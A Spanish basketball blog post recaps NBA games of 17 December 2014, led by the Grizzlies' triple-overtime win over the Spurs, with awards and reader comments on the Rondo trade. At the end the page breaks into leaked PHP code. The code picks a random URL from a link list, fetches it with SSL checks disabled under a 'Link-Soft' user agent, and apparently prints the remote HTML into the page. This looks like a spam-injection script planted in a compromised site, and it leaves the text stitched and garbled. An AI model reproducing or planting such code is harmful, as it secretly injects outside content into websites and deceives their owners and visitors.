La crónica: El mayor espectáculo del mundo

18 de December de 2014 por MagicJohnson32

No lean esta crónica. No malgasten su precioso tiempo leyendo una narración de los hechos que jamás, ni en un momento de máxima inspiración por parte de quien teclea esto, se aproximará a kilómetros de distancia de lo que aconteció anoche en el AT&T de San Antonio. Los Grizzlies vencieron a los Spurs pero el resultado es casi lo de menos. Dejen de leer inmediatamente y hagan todo lo humanamente posible para ver el partido. Me lo agradecerán. Si, por algún motivo, siguen leyendo, les explicaré que hubo mucho más que saborear en la pasada madrugada, como la humillación recibida por los Cavs o una nueva exhibición de James Harden, pero me temo que nuestra crónica de hoy tendrá un foco de atención.

Bienvenidos al mayor espectáculo del mundo.

grizzspurs

Memphis Grizzlies 117 – San Antonio Spurs 116 (3OT)

Un triple de Conley para empatar el partido con 7 segundos en el reloj; un triple de Danny Green a falta de 0:02 para poner el 89-92; un triple de Marc Gasol, sobre la bocina y a tabla, para forzar la primera prórroga; un rebote ofensivo y posterior bandeja de Gasol a 0:09 para llevar el partido a una segunda prórroga; un triple de Courtney Lee a 0:02 para poner a los Grizzlies +2, seguido por un fadeaway de Tim Duncan sobre la bocina que tocó aro y tablero antes de entrar y forzar la tercera prórroga; y, finalmente un último lanzamiento de Ginóbili a todo o nada que resultó en airball y bandera blanca de los Spurs, dignísimos perdedores de uno de los mejores partidos de regular season que se recuerdan. Marc Gasol fue héroe, Zach Randolph fue un gigante y Danny Green hizo historia al convertirse en el primer jugador con al menos 7 triples y 5 tapones en un mismo partido. Los Grizzlies enlazan así 6 victorias y se quedan a medio partido de los Warriors en lo alto del Oeste y de la liga. Pero, insisto, este es un partido para verlo, no para leerlo.

Atlanta Hawks 127 – Cleveland Cavaliers 98

Hay quien diría que los Hawks estaban escalando posiciones en el Este sin hacer mucho ruido. Ya no, porque su victoria en pista de los Cavs, más que ruidosa fue un auténtico trueno. A pesar de no contar con Jeff Teague (su máximo anotador y asistente), los Hawks mostraron sus mejores virtudes y pusieron en evidencia los peores defectos del proyecto dirigido por David Blatt. A base de rotación de balón y acierto exterior, los Hawks se recuperaron de un mejor inicio por parte de los locales y, a partir del segundo cuarto, no miraron atrás. Anotaron 16 de 28 triples y un 64,5% de sus tiros de campo, y deberíamos empezar a considerar a Mike Budenholzer como candidato al CoY.

Houston Rockets 115 – Denver Nuggets 111

Harden, Harden, Harden. En todo lo ocurrido anoche en Denver dejó sus huellas el hombre de la barba. Él anotó el triple que ponía a los Rockets +2 a 10 segundos para el final, él robó a continuación el balón, él falló el tiro libre que abrió la puerta al triple de Afflalo para forzar la prórroga y, llegado el tiempo extra, él sentenció la victoria para los de McHale. Lo tuvieron los Nuggets para lograr una victoria que los saque del estado depresivo en el que vuelven a encontrarse pero Harden, con la colaboración inestimable de Howard, Beverley y Motiejunas, tenía otros planes.

Resto de la jornada

La jornada se completó con la sorprendentemente sufrida victoria de los Clippers ante los Pacers (100-102), para lo que hicieron falta grandes actuaciones de Griffin, Jordan y Paul. El triunfo permite a los angelinos seguir el paso de Blazers y Mavs, que también sacaron adelante sus compromisos de anoche. Portland venció a los Bucks (97-104), ya sin Jabari y con lesión de Antetokounmpo, mientras los Mavs ganaron en Detroit (117-106) con un excelente Parsons. Unos que luchan por mantener opciones de playoffs son los Suns, que recuperaron a Dragic y lo notaron de la mejor manera posible para batir a los Hornets (111-106). Y el Oeste barrió al Este (5 victorias en los 5 duelos interconferencias de anoche) con la paliza de los Jazz a Miami (105-87) pese a los 42 puntos de Wade. Cerramos el repaso a lo acontecido con las cómodas victorias de Raptors sobre Nets (89-105) y Celtics sobre Magic (92-109).

PREMIOS

MVP: Hayward (29-6-7), Parsons (32-7-2-2), Zach Randolph (21 puntos, 21 rebotes) y Marc Gasol (26-9-2-2) palidecen ante James Harden y sus 41 puntos, 10 asistencias, 4 rebotes y 2 robos.

Rookie: Free Nurkic!! El pívot de los Nuggets Jusuf Nurkic logró 6 puntos, 8 rebotes y 2 robos en apenas 17 minutos de juego.

Sorpresa: Shelvin Mack estalló en Cleveland y fue de los mejores en el espectacular triunfo de los Hawks con 6/6 triples y 24 puntos en 23 minutos.

Decepción: Todos los jugadores de los Heat no llamados Dwyane.

Mayor esfuerzo en vano: El premio está entre D-Wade, autor de 42 puntos (12/19 FG 16/21 FT), 4 rebotes y 3 asistencias, y Andre Drummond 19 puntos, 24 rebotes, 4 robos y 3 tapones.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Joder,sólo viendo el resumen en vídeo se pone uno a tope,tremendo,¿el mejor partido del curso?Vaya fallo de Ginóbili en la primera prórroga por cierto,ese pase ahí llovido con defensores Grizzlies cerca…demasiado arriesgado.

    Si lo sé no hubiera visto el partido de los Cavs en favor del duelo de la SW.Vaya violación en toda regla,pésima defensa de Cleveland dejando en la mayoría de ocasiones tirar solos a los jugadores de los Hawks,que no son precisamente mancos en ese apartado.Dar pasos adelante para toparse con estos desastres de nuevo.

      Citar

  2. Ruxixón dice:
    #2

    Por cierto,sigo en la cruzada Mason Plumlee,23 puntos y 8 rebotes.Hola Brook Lopez.

      Citar

  3. Futurman dice:
    #3

    El problema de Cavs está en Love, antes no defendía mucho; pero era en parte por desidia. Ahora le faltan kilos para parar a cualquier interior digno y eso implica que equipos que jueguen con dos interiores les abran en canal.

    El resto del equipo defiende regular, pero intuyo que se podría lograr algo parecido a en Miami (que infravalorado está Spoelstra) con la salvedad que Varejao es mejor que Haslem. Love debería ganar peso y fuerza, si no, se quedará en un Ryan Anderson sobrepagado, por que pierde el posteo hasta en ataque, lo que antes era su punto fuerte también.

    Un trade con Dion por un tronco en la pintura y un escolta defensivo (o lo que se pueda) les daría la vida.

      Citar

  4. Ruxixón dice:
    #4

    ¡Ese twitter!Ese traspaso habla del valor de mercado de Rondo a estas alturas.Eso sí,si se pone al mismo nivel competitivo en el que está Dallas,que no nos engañemos,Rondo está así porque no hay nada que rascar en los Celtics a corto plazo,para mí,equipazo el de Dallas.Carlisle…que hace dos años jugaba con Mike James de PG titular en los Mavs…xDDD

    @Futurman: no me gusta señalar a Love como motivo único pero quizás si que por ahí se genera parte del desequilibrio,no obstante existen errores muy graves y no sólo del 42.

      Citar

  5. Jose A. Ramírez dice:
    #5

    Es vergonzoso lo del traspaso de rondo, a el PAYASO de ainge no le basto con quitarse a los jugadores que daban la vida por esa camiseta, que aun podian estar ahi por cierto viendo lo que ha estado construyendo estos años… que va ahora y lo regala a Dallas por tres mataos que algun dia diran que vistieron la camiseta celtic. Lo que quedaba del orgullo celtico de mi parte lo ha jodido un mierda que no sabe ni lo que ha hecho estas ultimas temporadas, ni sabe lo que ha hecho ni sabe ni donde tiene la cara.. declarando esta misma mañana que solo habria traspaso si habia estrellas de por medio o jugadores buenos solidos de rol…. Ahora que se coma el mojon bien grande de intentar traer a una estrella el año que viene, para que luego le falte el mejor base de la liga, aver que busque por ahi y lo pinte.. podeis decir lo que querais pero algunos por jugadores basura encuentran mejor premio que lo conseguido por el muerto hambre este…. Que crack es Cuban, el consuelo que me queda que al menos se va a un equipo que me gusta. Que tiemblen los del oeste, que Rondo adaptado hace desde ya favorito a Dallas. Perdonen el lenguaje pero es inaceptable lo que el tiparraco este a hecho, y yo creo que los fans de Boston pensamos lo mismo. De hecho, no me creido ni que fuera cierto, pensaba que era una broma. Estado de shock. Na, ahora a ver los crawder wright olynicks y faveranis de turno. Tengo envidia de los sixers….

      Citar

  6. franitis dice:
    #6

    INCREÍBLE… Perder a tu estrella para no traer nada bueno a cambio…

      Citar

  7. Denise dice:
    #7

    franitis:
    INCREÍBLE… Perder a tu estrella para no traer nada bueno a cambio…

    Yo no creo que el traspaso sea tan bueno para los Mavs ni tan malo para los Celtics. Tengo muchas dudas de la dupla Rondo-Monta. A ver si dentro de un rato puedo explicarlo con mas detalles, )cuando mi jefe se vaya de reunion)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>